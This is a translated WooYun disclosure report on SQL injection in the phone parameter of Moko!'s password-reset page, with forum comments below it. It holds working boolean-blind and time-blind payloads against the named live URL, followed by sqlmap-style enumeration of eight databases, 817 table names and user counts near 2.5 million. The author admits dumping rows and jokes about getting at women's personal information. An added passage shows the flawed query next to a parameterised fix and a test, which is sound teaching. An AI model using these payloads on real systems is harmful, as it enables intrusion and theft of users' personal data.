
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0135224

Title: Moko! (美空) main site SQL injection exposes nearly three million users' information

Vendor: Moko! 美空

Author: 路人甲

Submitted: 2015-08-19 10:16

Fixed: 2015-08-24 10:18

Published: 2015-08-24 10:18

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: vendor notified, but vendor ignored the vulnerability

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-08-19: details sent to the vendor, awaiting vendor handling
2015-08-24: vendor actively ignored the vulnerability, details disclosed to the public

Brief description:

The data is really sensitive. It's Qixi (Chinese Valentine's Day), take a girl home, bonus pics included!

Detailed description:

By the way, this girl is really pretty. Next, how I got the girls' information.

[image: img2_src_10549265.jpg]


Go to the password reset page:
http://www.moko.cc/forgetPassword%7CupdatePhonePwd.action
The phone parameter is directly blind-injectable; no need to say more.
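The endpoint above splices the phone parameter into SQL text, which is what makes the boolean-blind and time-blind payloads in the proof section work. As an added example, not code from the original report or from Moko!, the block below shows that defect pattern beside its fix (a bound parameter), plus a digits-only input check, against an in-memory SQLite table filled with constructed rows. The injected condition follows the shape of the report's RLIKE payload but uses a plain comparison because RLIKE is MySQL-specific. The function names, the phone format, and the sample phone numbers are assumptions.

```python
import re
import sqlite3

# Constructed sample rows (not from the report): a small "user" table standing in
# for the site's phone lookup during password reset.
SAMPLE_USERS = [
    (1, "13800000001", "alice"),
    (2, "13800000002", "bob"),
]


def make_db():
    """Build an in-memory SQLite database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, phone TEXT, name TEXT)")
    conn.executemany("INSERT INTO user VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, phone):
    """Defect pattern behind the report: the parameter is spliced into the SQL text,
    so a quote in the input closes the string literal and the rest becomes SQL."""
    sql = "SELECT id, name FROM user WHERE phone = '" + phone + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, phone):
    """Hardened form: the value travels as a bound parameter, separate from the query
    text, so it is compared as one literal string no matter what it contains."""
    sql = "SELECT id, name FROM user WHERE phone = ?"
    return conn.execute(sql, (phone,)).fetchall()


# Assumed phone format: 6 to 15 digits, nothing else.
PHONE_RE = re.compile(r"\d{6,15}")


def is_valid_phone(phone):
    """Defence in depth: reject anything that is not a plain digit string before it
    reaches the database. This complements, and does not replace, bound parameters."""
    return PHONE_RE.fullmatch(phone) is not None


def condition_observable(conn, lookup):
    """Boolean-blind check from the defender's side: send the same phone with an
    injected condition that is true, then one that is false, and report whether the
    two results differ. A difference means the condition reached the SQL engine."""
    base = "13800000001"
    true_input = base + "' AND (4973=4973) AND 'x'='x"
    false_input = base + "' AND (4973=4974) AND 'x'='x"
    return lookup(conn, true_input) != lookup(conn, false_input)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable lookup leaks condition:", condition_observable(db, lookup_vulnerable))
    print("parameterised lookup leaks condition:", condition_observable(db, lookup_safe))
```

`condition_observable` is the same true/false comparison a scanner relies on, turned into a regression test: run it against your own lookup code and expect `False`. The digits-only check stops sqlmap-style inputs at the edge, but the bound parameter is the fix, because it holds for any input the validation rule did not anticipate.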

Proof of vulnerability:

Parameter: phone (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: ForgetPassword_phone=ForgetPassword_phone&get_phone_code=%e8%8e%b7%e5%8f%96%e9%aa%8c%e8%af%81%e7%a0%81&j_image_code_response=94102&passwordConfirm=wy123456&phone=123' RLIKE (SELECT (CASE WHEN (4973=4973) THEN 123 ELSE 0x28 END)) AND 'wIpU'='wIpU&user_password=chsmqxth&valideCode=94102
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: ForgetPassword_phone=ForgetPassword_phone&get_phone_code=%e8%8e%b7%e5%8f%96%e9%aa%8c%e8%af%81%e7%a0%81&j_image_code_response=94102&passwordConfirm=wy123456&phone=123' AND (SELECT * FROM (SELECT(SLEEP(5)))hUHY) AND 'aBjY'='aBjY&user_password=chsmqxth&valideCode=94102
---
back-end DBMS: MySQL 5.0.12
current user: 'jht2010@192.168.%'
available databases [8]:
[*] information_schema
[*] mokobook
[*] mokodb
[*] mysql
[*] openfire
[*] performance_schema
[*] pushservice
[*] wxmoko
Database: mokodb
[817 tables]
+-------------------------------------+
| T_RSS_AUTH |
| T_RSS_VENDOR_AUTHORITY |
| T_RSS_VISIT |
| T_RSS_VISIT_TOP |
| user |
| admin_function |
| admin_log |
| admin_pay |
| admin_user |
| admin_user_function |
| aliwap_order |
| aliwap_order_detail |
| aliwap_pay |
| aliwap_pay_log |
| allmessage |
| app_homepageadvert |
| app_product_info |
| app_user |
| app_users_statis |
| app_users_type |
| appgallery |
| appgallery_item |
| apply_card |
| apply_card_item |
| apply_mp |
| apply_mp_item |
| apply_mp_tixing |
| apply_vip |
| article |
| article_banner |
| article_show |
| blacklist |
| blog_ref |
| blog_topic |
| blog_user |
| blog_user_count |
| blog_user_hot |
| blog_zhuanfa |
| cj_banner |
| cj_company |
| cj_user |
| cj_work_appoint |
| comment |
| company |
| content_count_message |
| content_count_message_history |
| dic_area |
| dic_daxue |
| dic_zhuanye |
| dingdan_cooperate |
| dingdan_topic |
| disanfang_qq_token |
| disanfang_qq_tongbu |
| disanfang_sina_token |
| disanfang_sina_tongbu |
| disanfang_wechat_token |
| dw_auth_config |
| dw_blacklist |
| dw_box |
| dw_box_apply |
| dw_broadcast_movement |
| dw_category |
| dw_charge_log |
| dw_charge_type |
| dw_city |
| dw_complain |
| dw_complain_type |
| dw_constellation |
| dw_employee_list |
| dw_employee_role_list |
| dw_fans_exps |
| dw_fans_exps_level |
| dw_fans_info |
| dw_fans_info_temp |
| dw_fanstogirl_month |
| dw_feedback |
| dw_function_list |
| dw_function_role_list |
| dw_funding |
| dw_funding_config |
| dw_funding_config_reward |
| dw_funding_log |
| dw_funding_movement |
| dw_gift |
| dw_gift_exchange_log |
| dw_gift_type |
| dw_girl_apply |
| dw_girl_daily_tasks |
| dw_girl_error |
| dw_girl_exps |
| dw_girl_exps_level |
| dw_girl_exps_week |
| dw_girl_info |
| dw_girl_shows |
| dw_girl_shows_item |
| dw_homepageadvert |
| dw_interceptor_config |
| dw_login_log |
| dw_mainpage_girls |
| dw_message |
| dw_pay |
| dw_pay_bill |
| dw_pay_log |
| dw_pay_plan |
| dw_pay_report |
| dw_professions |
| dw_push |
| dw_push_log_all |
| dw_push_log_api |
| dw_push_log_batch |
| dw_push_log_single |
| dw_push_log_tag |
| dw_push_user |
| dw_relation |
| dw_reply |
| dw_role_list |
| dw_share_log |
| dw_statis_girl |
| dw_statis_girls |
| dw_statis_users |
| dw_status |
| dw_status_index |
| dw_status_item |
| dw_sys_award |
| dw_sys_award_type |
| dw_talk |
| dw_talk_detail_movement |
| dw_talk_movement |
| dw_talk_status |
| dw_task_list |
| dw_task_log |
| dw_taskconf_log |
| dw_user_fanslevel |
| dw_user_message |
| dw_versions |
| dw_versions_type |
| dw_weblogpost_temp |
| elephoto_user |
| email_activate_log |
| email_blacklist |
| event_bad_comment |
| event_comment |
| experiencetype |
| fashionpe |
| forbid |
| fs_count |
| fs_description |
| fs_subscribe_00 |
| fs_subscribe_01 |
| fs_subscribe_02 |
| fs_subscribe_03 |
| fs_subscribe_04 |
| fs_subscribe_05 |
| fs_subscribe_06 |
| fs_subscribe_07 |
| fs_subscribe_08 |
| fs_subscribe_09 |
| fs_subscribe_10 |
| fs_subscribe_11 |
| fs_subscribe_12 |
| fs_subscribe_13 |
| fs_subscribe_14 |
| fs_subscribe_15 |
| fs_subscribe_16 |
| fs_subscribe_17 |
| fs_subscribe_18 |
| fs_subscribe_19 |
| fs_subscribe_20 |
| fs_subscribe_21 |
| fs_subscribe_22 |
| fs_subscribe_23 |
| fs_subscribe_24 |
| fs_subscribe_25 |
| fs_subscribe_26 |
| fs_subscribe_27 |
| fs_subscribe_28 |
| fs_subscribe_29 |
| fs_subscribe_30 |
| fs_subscribe_31 |
| fs_subscribe_32 |
| fs_subscribe_33 |
| fs_subscribe_34 |
| fs_subscribe_35 |
| fs_subscribe_36 |
| fs_subscribe_37 |
| fs_subscribe_38 |
| fs_subscribe_39 |
| fs_subscribe_40 |
| fs_subscribe_41 |
| fs_subscribe_42 |
| fs_subscribe_43 |
| fs_subscribe_44 |
| fs_subscribe_45 |
| fs_subscribe_46 |
| fs_subscribe_47 |
| fs_subscribe_48 |
| fs_subscribe_49 |
| fs_subscribe_50 |
| fs_subscribe_51 |
| fs_subscribe_52 |
| fs_subscribe_53 |
| fs_subscribe_54 |
| fs_subscribe_55 |
| fs_subscribe_56 |
| fs_subscribe_57 |
| fs_subscribe_58 |
| fs_subscribe_59 |
| fs_subscribe_60 |
| fs_subscribe_61 |
| fs_subscribe_62 |
| fs_subscribe_63 |
| fs_subscribe_64 |
| fs_subscribe_65 |
| fs_subscribe_66 |
| fs_subscribe_67 |
| fs_subscribe_68 |
| fs_subscribe_69 |
| fs_subscribe_70 |
| fs_subscribe_71 |
| fs_subscribe_72 |
| fs_subscribe_73 |
| fs_subscribe_74 |
| fs_subscribe_75 |
| fs_subscribe_76 |
| fs_subscribe_77 |
| fs_subscribe_78 |
| fs_subscribe_79 |
| fs_subscribe_80 |
| fs_subscribe_81 |
| fs_subscribe_82 |
| fs_subscribe_83 |
| fs_subscribe_84 |
| fs_subscribe_85 |
| fs_subscribe_86 |
| fs_subscribe_87 |
| fs_subscribe_88 |
| fs_subscribe_89 |
| fs_subscribe_90 |
| fs_subscribe_91 |
| fs_subscribe_92 |
| fs_subscribe_93 |
| fs_subscribe_94 |
| fs_subscribe_95 |
| fs_subscribe_96 |
| fs_subscribe_97 |
| fs_subscribe_98 |
| fs_subscribe_99 |
| fs_subscribe_double |
| fs_subscribe_group |
| guanggao_html |
| guanggao_html_pics |
| guanggao_oplog |
| guanggao_pics |
| gumt_item |
| gumt_user |
| gz_subscribe_00 |
| gz_subscribe_01 |
| gz_subscribe_02 |
| gz_subscribe_03 |
| gz_subscribe_04 |
| gz_subscribe_05 |
| gz_subscribe_06 |
| gz_subscribe_07 |
| gz_subscribe_08 |
| gz_subscribe_09 |
| gz_subscribe_10 |
| gz_subscribe_11 |
| gz_subscribe_12 |
| gz_subscribe_13 |
| gz_subscribe_14 |
| gz_subscribe_15 |
| gz_subscribe_16 |
| gz_subscribe_17 |
| gz_subscribe_18 |
| gz_subscribe_19 |
| gz_subscribe_20 |
| gz_subscribe_21 |
| gz_subscribe_22 |
| gz_subscribe_23 |
| gz_subscribe_24 |
| gz_subscribe_25 |
| gz_subscribe_26 |
| gz_subscribe_27 |
| gz_subscribe_28 |
| gz_subscribe_29 |
| gz_subscribe_30 |
| gz_subscribe_31 |
| gz_subscribe_32 |
| gz_subscribe_33 |
| gz_subscribe_34 |
| gz_subscribe_35 |
| gz_subscribe_36 |
| gz_subscribe_37 |
| gz_subscribe_38 |
| gz_subscribe_39 |
| gz_subscribe_40 |
| gz_subscribe_41 |
| gz_subscribe_42 |
| gz_subscribe_43 |
| gz_subscribe_44 |
| gz_subscribe_45 |
| gz_subscribe_46 |
| gz_subscribe_47 |
| gz_subscribe_48 |
| gz_subscribe_49 |
| gz_subscribe_50 |
| gz_subscribe_51 |
| gz_subscribe_52 |
| gz_subscribe_53 |
| gz_subscribe_54 |
| gz_subscribe_55 |
| gz_subscribe_56 |
| gz_subscribe_57 |
| gz_subscribe_58 |
| gz_subscribe_59 |
| gz_subscribe_60 |
| gz_subscribe_61 |
| gz_subscribe_62 |
| gz_subscribe_63 |
| gz_subscribe_64 |
| gz_subscribe_65 |
| gz_subscribe_66 |
| gz_subscribe_67 |
| gz_subscribe_68 |
| gz_subscribe_69 |
| gz_subscribe_70 |
| gz_subscribe_71 |
| gz_subscribe_72 |
| gz_subscribe_73 |
| gz_subscribe_74 |
| gz_subscribe_75 |
| gz_subscribe_76 |
| gz_subscribe_77 |
| gz_subscribe_78 |
| gz_subscribe_79 |
| gz_subscribe_80 |
| gz_subscribe_81 |
| gz_subscribe_82 |
| gz_subscribe_83 |
| gz_subscribe_84 |
| gz_subscribe_85 |
| gz_subscribe_86 |
| gz_subscribe_87 |
| gz_subscribe_88 |
| gz_subscribe_89 |
| gz_subscribe_90 |
| gz_subscribe_91 |
| gz_subscribe_92 |
| gz_subscribe_93 |
| gz_subscribe_94 |
| gz_subscribe_95 |
| gz_subscribe_96 |
| gz_subscribe_97 |
| gz_subscribe_98 |
| gz_subscribe_99 |
| ip |
| iphone_count |
| iphone_pic |
| iphone_token |
| jinqw_item |
| jinqw_user |
| job |
| job_apply |
| job_apply_log |
| job_apply_oppose |
| job_comment |
| job_cover |
| job_info |
| job_issuer_info |
| job_item |
| job_keyword |
| job_pay |
| job_pay_log |
| job_tail |
| job_tail_log |
| job_tail_option |
| jrbs_user |
| js_config |
| linshi_lastlogintime |
| linshi_nickname |
| linshi_username |
| linshi_uservocation_quchong |
| mb_behavior_applyJob |
| mb_behavior_daily |
| mb_behavior_user |
| mb_behavior_weblogpost |
| mb_push_log |
| mb_push_user |
| mb_weblogpost |
| meilai_vote |
| meilai_vote_code |
| meilai_vote_user |
| meilai_vote_user_pic |
| message_apply_card |
| message_apply_mip |
| message_apply_mp |
| message_birthday |
| message_delconfig |
| message_gift |
| message_moko |
| message_post |
| message_receive |
| message_send |
| message_subscribe |
| message_summary |
| message_system |
| message_system_company |
| message_system_level |
| message_system_log |
| message_system_vocation |
| message_user_history |
| moko_banner |
| moko_event |
| moko_level |
| moko_order |
| moko_order_comment |
| moko_order_detail |
| moko_order_money |
| moko_order_pay_temp |
| moko_order_product |
| moko_search_collect_log_t |
| moko_search_user_info_t |
| moko_search_weblogpost_info_t |
| moko_user_level |
| mokocall_info |
| mpe_comment |
| mpe_item |
| mpe_news |
| mpe_user |
| mpe_vote |
| msp_topic |
| msp_topic_item |
| mtb_cpAnalyse_info |
| mtb_dataAnalyse_info |
| mtb_extendAnalyse_info |
| mtb_hotjobs |
| mtb_joblabel |
| mtb_joblabel_user |
| mtb_jobstyle |
| mtb_jobstyle_user |
| mtb_message |
| mtb_modelcard |
| mtb_modelcard_log |
| mtb_norm |
| mtb_quote |
| mtb_quote_other |
| mtb_quote_pic |
| mtb_reserve |
| mtb_reserve_log |
| mtb_user |
| mtb_userinfo |
| mtb_works |
| mtb_wx_apply |
| mtg5_comment |
| mtg5_count |
| mtg5_item |
| mtg5_limit |
| mtg5_news |
| mtg5_user |
| mtg5_user_aoyun |
| mtg5_user_fusai |
| mtg5_user_qiche |
| mtg5_user_qq |
| mtg5_user_tuijian |
| mtg5_user_vote |
| mtg5_user_week |
| mtg5_user_youxi |
| mtg5_user_zuqiu |
| mtg5_video |
| mtg5_video_ad |
| mtg5_video_comment |
| mtg5_video_pingwei |
| mtg5_video_shangpin |
| mtg5_video_zanzhushang |
| mtg_pic |
| mtg_shangjia |
| mtg_shangpin |
| mtg_shangpin_count |
| mtg_topic |
| mtg_topic_count |
| nbps_user |
| nickname_protect |
| notice |
| online |
| online_log |
| pay_ali_item |
| pay_consume_item |
| pay_gift |
| pay_in_out_detail |
| pay_item |
| pay_item_log |
| pay_log |
| pay_msp |
| pay_user |
| pay_user_account |
| pay_user_backup |
| pay_user_bank |
| pay_user_code |
| pay_user_out |
| pay_yb_item |
| personnel_training |
| personnel_training_pic |
| phonecode_log |
| photoverify |
| pic_count |
| pic_server |
| pps2_class |
| pps2_pic |
| pps_Photographer |
| pps_User |
| pps_post |
| pps_post_item |
| pps_product_info |
| pps_product_info_item |
| pps_vote |
| pps_vote_config |
| pps_vote_user |
| product_profoto |
| product_profoto_user |
| profoto_user |
| project |
| project_enter |
| project_item |
| qgdcj_user |
| qrcode |
| qysys_user |
| rayli_item |
| rayli_user |
| register_log |
| register_user |
| register_user_log |
| safebox |
| saohuanguser |
| shangwj_item |
| shangwj_user |
| shdg_user |
| shoolshow_vote |
| shoolshow_vote_user |
| shorturl_key |
| shorturl_value |
| sinafootballgirl_user |
| sinai_item |
| sinai_user |
| splitable_config |
| sys_config |
| test_apply |
| timeline |
| timeline_item |
| timeline_photo |
| timeline_reply |
| timeline_reply_reminder |
| timertask_error |
| tongji_user_month |
| tongji_user_month_temp |
| tongji_user_v |
| tongji_user_week |
| tongji_user_week_dive |
| tongji_user_week_list |
| tongji_user_week_lose |
| tongji_user_week_temp |
| tongji_user_week_temp_p |
| tongji_user_week_temp_v |
| tongji_userlogin |
| tongji_weblogpost |
| ub_config |
| ub_function |
| ub_user_behavior_log |
| ub_user_behavior_log_backup |
| user_auth_status |
| user_background |
| user_bad_complaint |
| user_broker |
| user_center_huodong |
| user_center_huodong_user |
| user_center_info_search |
| user_center_infoshouji |
| user_center_manage |
| user_company |
| user_constant |
| user_cp |
| user_cp_index |
| user_face |
| user_function |
| user_gonggao |
| user_jianjie |
| user_job |
| user_largerlogo |
| user_lianluo |
| user_loginlog |
| user_loginlog_tmp |
| user_loginlog_tmp1 |
| user_mokocall |
| user_new |
| user_op |
| user_pcard_image |
| user_person_image |
| user_phone |
| user_private |
| user_profile |
| user_profile_address |
| user_profile_aihao |
| user_profile_broker |
| user_profile_huodong_caifang |
| user_profile_huodong_other |
| user_profile_huojiang_other |
| user_profile_huojiang_top |
| user_profile_joblabel |
| user_profile_lianluo |
| user_profile_lianluo_log |
| user_profile_other |
| user_profile_work_company |
| user_profile_work_jingli |
| user_profile_xuexiao_daxue |
| user_profile_xuexiao_peixun |
| user_profile_zuopin_daibiaozuo |
| user_profile_zuopin_other |
| user_profile_zuopin_zhanlan |
| user_progress |
| user_search_name |
| user_setpassword |
| user_setwkey |
| user_status |
| user_updatename |
| user_uploadlogo |
| user_vocation_good |
| user_yijuhua |
| user_yiren |
| user_yiren_apply |
| user_yuyue |
| user_zhaopin |
| user_zhizhao |
| userexperience_sort |
| userlogin_ip1 |
| userlogin_ip2 |
| userlogin_time1 |
| userlogin_time2 |
| userlogin_userid1 |
| userlogin_userid2 |
| username_history |
| uservocation |
| uservocation_b_userid |
| uservocation_bakforadd |
| visitortrack |
| vocation |
| vocation_hot |
| vocation_relation |
| vocation_tag |
| vocation_tag_contact |
| vocation_tag_new |
| vocation_tag_relation |
| vocation_tmp |
| weblog |
| weblogpost |
| weblogpost_class |
| weblogpost_collection |
| weblogpost_collection_count |
| weblogpost_count |
| weblogpost_geili_count |
| weblogpost_geili_log |
| weblogpost_history |
| weblogpost_history_det |
| weblogpost_item_00 |
| weblogpost_item_01 |
| weblogpost_item_02 |
| weblogpost_item_03 |
| weblogpost_item_04 |
| weblogpost_item_05 |
| weblogpost_item_06 |
| weblogpost_item_07 |
| weblogpost_item_08 |
| weblogpost_item_09 |
| weblogpost_item_10 |
| weblogpost_item_11 |
| weblogpost_item_12 |
| weblogpost_item_13 |
| weblogpost_item_14 |
| weblogpost_item_15 |
| weblogpost_item_16 |
| weblogpost_item_17 |
| weblogpost_item_18 |
| weblogpost_item_19 |
| weblogpost_item_20 |
| weblogpost_item_21 |
| weblogpost_item_22 |
| weblogpost_item_23 |
| weblogpost_item_24 |
| weblogpost_item_25 |
| weblogpost_item_26 |
| weblogpost_item_27 |
| weblogpost_item_28 |
| weblogpost_item_29 |
| weblogpost_item_30 |
| weblogpost_item_31 |
| weblogpost_item_32 |
| weblogpost_item_33 |
| weblogpost_item_34 |
| weblogpost_item_35 |
| weblogpost_item_36 |
| weblogpost_item_37 |
| weblogpost_item_38 |
| weblogpost_item_39 |
| weblogpost_item_40 |
| weblogpost_item_41 |
| weblogpost_item_42 |
| weblogpost_item_43 |
| weblogpost_item_44 |
| weblogpost_item_45 |
| weblogpost_item_46 |
| weblogpost_item_47 |
| weblogpost_item_48 |
| weblogpost_item_49 |
| weblogpost_item_50 |
| weblogpost_item_51 |
| weblogpost_item_52 |
| weblogpost_item_53 |
| weblogpost_item_54 |
| weblogpost_item_55 |
| weblogpost_item_56 |
| weblogpost_item_57 |
| weblogpost_item_58 |
| weblogpost_item_59 |
| weblogpost_item_60 |
| weblogpost_item_61 |
| weblogpost_item_62 |
| weblogpost_item_63 |
| weblogpost_item_64 |
| weblogpost_item_65 |
| weblogpost_item_66 |
| weblogpost_item_67 |
| weblogpost_item_68 |
| weblogpost_item_69 |
| weblogpost_item_70 |
| weblogpost_item_71 |
| weblogpost_item_72 |
| weblogpost_item_73 |
| weblogpost_item_74 |
| weblogpost_item_75 |
| weblogpost_item_76 |
| weblogpost_item_77 |
| weblogpost_item_78 |
| weblogpost_item_79 |
| weblogpost_item_80 |
| weblogpost_item_81 |
| weblogpost_item_82 |
| weblogpost_item_83 |
| weblogpost_item_84 |
| weblogpost_item_85 |
| weblogpost_item_86 |
| weblogpost_item_87 |
| weblogpost_item_88 |
| weblogpost_item_89 |
| weblogpost_item_90 |
| weblogpost_item_91 |
| weblogpost_item_92 |
| weblogpost_item_93 |
| weblogpost_item_94 |
| weblogpost_item_95 |
| weblogpost_item_96 |
| weblogpost_item_97 |
| weblogpost_item_98 |
| weblogpost_item_99 |
| weblogpost_job |
| weblogpost_job_key |
| weblogpost_job_user |
| weblogpost_month |
| weblogpost_month_laji |
| weblogpost_select |
| weblogpost_select_0 |
| weblogpost_select_2 |
| weblogpost_select_3 |
| weblogpost_select_3_bak |
| weblogpost_select_bizhi |
| weblogpost_select_mobile |
| weblogpost_select_msp |
| weblogpost_select_mxk |
| weblogpost_select_user |
| weblogpost_style |
| weblogpost_title |
| weblogpost_tuijian_count |
| weblogpost_user_tuijian |
| weblogpost_user_tuijian_vote |
| weblogpost_user_tuijian_vote_backup |
| weblogpost_user_tuijian_vote_post |
| weblogpost_user_tuijian_vote_users |
| weblogpost_vocation_tag |
| weblogpost_vocation_tag_new |
| weblogtempl |
| weblogtempl_item |
| weibo_v |
| weixin_auth |
| weixin_order |
| weixin_order_detail |
| weixin_pay |
| weixin_pay_log |
| wkey_protect |
| wx_logs |
| wx_menu |
| wx_message |
| wx_messageitem |
| wx_messagetopic |
| wx_post |
| wx_postitem |
| wx_posttype |
| yiwen_item |
| yiwen_user |
| zhangwei_user |
| zhitongche |
| zm_choice |
| zm_item |
| zm_option |
| zm_post |
| zm_topic |
| zm_user |
| zm_user_info |
| zm_user_item |
| zm_vote |
| zm_vote_log |
+-------------------------------------+
Why so many tables.
back-end DBMS: MySQL 5.0.12
Database: mokodb
+--------+---------+
| Table | Entries |
+--------+---------+
| `user` | 2564898 |
+--------+---------+
Database: mokodb
+-----------+---------+
| Table | Entries |
+-----------+---------+
| blog_user | 1285711 |
+-----------+---------+
back-end DBMS: MySQL 5.0.12
Database: mokodb
+------------+---------+
| Table | Entries |
+------------+---------+
| user_phone | 69407 |
+------------+---------+
So the question is, where is the girls' information? /smirk

Fix recommendation:

I only dumped a few rows while testing and have deleted them; you can check the logs.
Fix it quickly!!!!!!!!!!!!!!
I saw comments under your earlier vulnerability reports saying your database had already been dumped ("pants pulled off").

Copyright notice: when reprinting, please credit the source, 路人甲@乌云


Vulnerability response

Vendor response:

Severity: no impact, vendor ignored

Ignored at: 2015-08-24 10:18

Vendor reply:

Vulnerability Rank: 15 (WooYun rating)

Latest status:

None


Vulnerability rating:

Comments

  1. 2015-08-19 10:18 | Manning ( regular white hat | Rank:559 vulns:78 | just hate having too few servers)

    I don't believe it!!!

  2. 2015-08-19 10:20 | 紫霞仙子 ( regular white hat | Rank:2027 vulns:279 | onward and upward !!!)

    @Manning Now I believe it!!!

  3. 2015-08-19 10:30 | 疯狗 certified white hat ( intern white hat | Rank:44 vulns:2 | having seen every vulnerability under heaven, my heart is naturally uncensored.)

    This one you really have to believe.

  4. 2015-08-19 10:44 | Manning ( regular white hat | Rank:559 vulns:78 | just hate having too few servers)

    @紫霞仙子 @疯狗 One SQL injection and you get to see the photo sets? Is there really such a good deal?

  5. 2015-08-19 10:59 | wy007 ( intern white hat | Rank:95 vulns:10 | actually I'm an undercover agent...)

    A goodies thread, OP is awesome!